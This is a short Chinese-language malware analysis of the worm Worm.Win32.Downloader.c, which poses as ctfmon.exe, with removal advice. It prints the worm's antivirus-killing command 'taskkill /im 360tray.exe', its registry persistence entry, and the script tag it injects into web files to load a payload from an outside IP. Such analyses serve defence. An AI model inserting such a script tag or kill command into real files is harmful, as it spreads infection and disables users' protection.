Worm.Win32.Downloader.c

Worm.Win32.Downloader.c是由Microsoft Visual C++ 6.0编写，通过网页漏洞传播的蠕虫病毒。

Worm.Win32.Downloader.c详细介绍

Worm.Win32.Downloader.c是由Microsoft Visual C++ 6.0编写，通过网页漏洞传播的蠕虫病毒。

行为分析

Worm.Win32.Downloader.c（ctfmon.exe）分析解决；Worm.Win32.Downloader.c分析

前面我们介绍过阿达的；ctfmon.exe；jisuanjibingdu/2007/1017/1353.html；AV命名：Win32.HLLW.Rubbish (Dr.Web v4.44);Worm.Win32.Downloader.c (kav 7.0.0.125)

1.释放批处理：

%Systemroot%system32tmipo.bat (24 字节)

用记事本打开.可见 taskkill /im 360tray.exe

然后进程cmd启动conime.exe (好像是废话)。

2.修改注册表，添加开机启动项

注册表键： HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun

注册表值： svchost

类型: REG_SZ

值： C:documents and SettingsAdministrator桌面ctfmon.exe

注：值为ctfmon.exe的所在路径

3.激活批处理tmipo.bat终止360安全卫士实时监控程序

命令行 taskkill /im 360tray.exe

4.然.后svchost.exe启动wmiprvse.exe -Embedding

命令行：C:WINDOWSsystem32wbemwmiprvse.exe -Embedding

5.连接网络 218.75.91.248

6.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，插入一段JS代码：

<script language=javascript src=http://218.75.91.248/qq.js></script>

解决方法：

1、断开网络，使.用wsyscheck终止并删除伪ctfmon.exe

3、使用iframekill清除被插入代码的网页

其他变种：Worm.Win32.Downloader.h

Kill_伪ctfmon_伪explorer